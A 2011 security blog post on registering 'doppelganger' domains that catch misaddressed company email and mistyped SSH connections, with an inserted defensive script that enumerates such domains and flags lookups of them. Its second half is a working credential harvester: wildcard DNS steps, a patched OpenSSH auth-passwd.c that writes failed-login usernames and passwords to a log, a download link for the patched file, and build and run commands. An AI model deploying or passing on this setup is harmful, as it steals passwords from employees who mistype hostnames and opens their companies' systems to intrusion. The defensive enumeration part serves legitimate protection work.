Doppelganging Your SSH Server

Dec 16, 2011 in Security

The Doppelganger Project

You might remember my last big research project on typosquatting (http://www.wired.com/threatlevel/2011/09/doppelganger-domains/), a very specific type of doppelganger attack. To recap, let's say your company has an email structure similar to this:

john.smith@us.company.com
john.smith@asia.company.com
john.smith@eu.company.com

The first thing I do is figure out all the different sub-domains a company might have. I have seen sub-domains built from countries, country codes, departments, cities, etc. The next step is to verify that these email sub-domains are actually in use; a couple of Google searches will quickly show how popular each one is. After that, I check whether the matching doppelganger domains are available. In this case, these would be the doppelganger domains you might want to purchase:

uscompany.com
asiacompany.com
eucompany.com

Once you find the appropriate doppelgangers, purchase those domains, set up an email server, enable catch-all, and watch misaddressed emails come in. That was our previous research project, and it was extremely successful. If your company has doppelganger domains, I hope you have purchased them all.
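From the defender's side, the same enumeration tells a company which names it should register or keep an eye on. The script below is an added example, not code from the original post: it generates the dot-dropped doppelganger candidates for a list of email addresses or hostnames, collapses them to the apex domains someone could register, and flags hostnames seen in (for instance) DNS or proxy logs that fall under one of those apexes. It generalises the single case shown above to any depth of sub-domain. The input addresses and logged hostnames are constructed samples, and the apex() helper assumes the registrable domain is the last two labels (a public-suffix list would be needed for names such as co.uk).

```python
"""Enumerate "dot-dropped" doppelganger domains for a company's sub-domains
and flag hostnames that fall under them, so the names can be registered or
watched defensively. Added example; not part of the original post."""
from typing import Iterable, List


def domain_of(address_or_host: str) -> str:
    """Return the domain part of an e-mail address, or the host itself, lower-cased."""
    return address_or_host.rsplit("@", 1)[-1].strip().strip(".").lower()


def doppelganger_candidates(hostname: str) -> List[str]:
    """Every name obtained by deleting exactly one dot from `hostname`,
    excluding the dot in front of the TLD (deleting that would not produce
    a registrable name).  us.company.com -> ['uscompany.com'];
    mail.us.company.com -> ['mailus.company.com', 'mail.uscompany.com']."""
    labels = domain_of(hostname).split(".")
    if len(labels) < 3:
        return []  # a bare second-level domain has no sub-domain dot to drop
    out = []
    for i in range(len(labels) - 2):
        merged = labels[:i] + [labels[i] + labels[i + 1]] + labels[i + 2:]
        out.append(".".join(merged))
    return out


def apex(hostname: str) -> str:
    """Registrable domain, assumed here to be the last two labels.
    Assumption: a public-suffix list would be needed for names like co.uk."""
    return ".".join(domain_of(hostname).split(".")[-2:])


def registrable_doppelgangers(addresses: Iterable[str]) -> List[str]:
    """Sorted, de-duplicated apex domains someone could register to catch
    traffic meant for the given addresses or hostnames."""
    found = set()
    for item in addresses:
        for cand in doppelganger_candidates(item):
            found.add(apex(cand))
    return sorted(found)


def flag_lookups(queried_hosts: Iterable[str], watchlist: Iterable[str]) -> List[str]:
    """Return the queried hostnames (e.g. from DNS or proxy logs) whose apex
    is one of the doppelganger domains in `watchlist`."""
    watch = {w.lower() for w in watchlist}
    return [h for h in queried_hosts if apex(h) in watch]


# Constructed sample input: the e-mail structure from the post.
EMAILS = [
    "john.smith@us.company.com",
    "john.smith@asia.company.com",
    "john.smith@eu.company.com",
]

# Constructed sample of hostnames a resolver or proxy might have logged.
LOGGED_HOSTS = [
    "test.uscompany.com",
    "www.company.com",
    "deadbeef.uscompany.com",
    "mail.eu.company.com",
]

if __name__ == "__main__":
    watch = registrable_doppelgangers(EMAILS)
    print("register or watch:", watch)
    print("suspicious lookups:", flag_lookups(LOGGED_HOSTS, watch))
```

Run against the company's real sub-domain inventory, the output of registrable_doppelgangers() is the list to check at the registrar, and flag_lookups() can be run periodically over resolver logs to catch users who have already mistyped a name.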

Tracking SSH Attempts

Now I decided to take this one step further. What if I set up an SSH server on those doppelganger domains and monitored login attempts? If someone who works for one of those companies tries to SSH to one of their servers but mistypes the hostname, we might be able to gain their credentials.

First, we need a wildcard DNS A record so that every name under the doppelganger domain resolves to one IP. For example, I set the A record host to “*” and pointed it at my IP address, so any subdomain within the doppelganger domain resolves to my server. Meaning:

test.uscompany.com
arp.uscompany.com
deadbeef.uscompany.com

all resolve to a single IP. Now we need to set up an SSH server that logs both the username and the password. For this I configured a server running Ubuntu 11.10. Since the stock sshd won’t record passwords, we have to build a modified sshd. I started by downloading OpenSSH portable 5.9p1, which is the current release.

wget http://mirror.team-cymru.org/pub/OpenBSD/OpenSSH/portable/openssh-5.9p1.tar.gz

To Extract:
tar xvfz openssh-5.9p1.tar.gz

Go into the openssh directory:
cd openssh-5.9p1

We need to modify auth-passwd.c before we compile sshd. Here is what I changed; I have also made the complete modified auth-passwd.c available to drop in [https://www.securepla.net/download/auth-passwd.c]:

if (!sys_auth_passwd(authctxt, password)) {
        /* Failed attempt: append "user:password:remote-ip" to the log file. */
        FILE *garp = fopen("/var/log/sshd_logged", "a");
        if (garp != NULL) {                     /* fopen() can fail; never fprintf() to NULL */
                chmod("/var/log/sshd_logged", 0600);  /* keep the log readable by root only */
                fprintf(garp, "%s:%s:%s\n", authctxt->user, password, get_remote_ipaddr());
                fclose(garp);
        }
}
return (result && ok);

What this does: whenever a login attempt fails, it appends the username, the password, and the source IP address to /var/log/sshd_logged.
After replacing auth-passwd.c, configure, compile, and install:
sudo ./configure --prefix=/opt --sysconfdir=/etc/ssh
make
sudo make install

Now we should have a working version of our new sshd service. To start sshd:
sudo /opt/sbin/sshd

Now you can just run the command:
tail -f /var/log/sshd_logged

And watch the usernames/passwords fly by.

Some things to help you out:
1) Don’t forget to set up some type of port forwarding on your external router if you are NAT’ed.
2) Enable fail2ban, unless you want SSH brute-forcers trying passwords all day. Once a single IP hits too many bad SSH logins in a row, fail2ban will temporarily ban that IP. This will help you get rid of false positives.
3) I am not a lawyer, and this was just for educational purposes. Please check with your lawyer or contact someone like the EFF to see what you can and can’t do.